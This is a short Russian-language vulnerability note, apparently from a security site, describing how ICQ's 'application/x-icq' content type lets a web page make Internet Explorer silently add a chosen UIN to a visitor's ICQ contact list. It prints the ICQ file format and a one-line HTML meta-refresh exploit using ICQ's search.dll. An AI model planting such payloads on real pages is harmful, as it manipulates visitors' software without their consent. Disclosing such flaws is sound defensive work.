• Партнер

  • Когда ICQ установлен, он добавляет Content-Type к Microsoft Internet Exploder, тип "application/x-icq". Когда IE получает "Content-Type:
    application/x-icq" от web сервера следующего содержания: 

    [ICQ User]
    UIN=<uin>
    Email=
    NickName=
    FirstName=
    LastName=

    IE автоматически загрузит содержание и заставит ICQ добавить этот UIN к контактному листу.

    Когда web-мастер создает страницу, содержащую эксплуатирующийся код, приведенный ниже, пользователь будет автоматически добавлен к списку контакта жертвы. Эта ошибка может
    использоваться против любой программы, которая использует IE.

    Эксплоит просто использует ICQ Web сервер, используя search.dll: 

    <HTML>
    <META HTTP-EQUIV="REFRESH" CONTENT="0;URL=http://wwp.icq.com/scripts/search.dll?to=<uin>">
    </HTML>

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии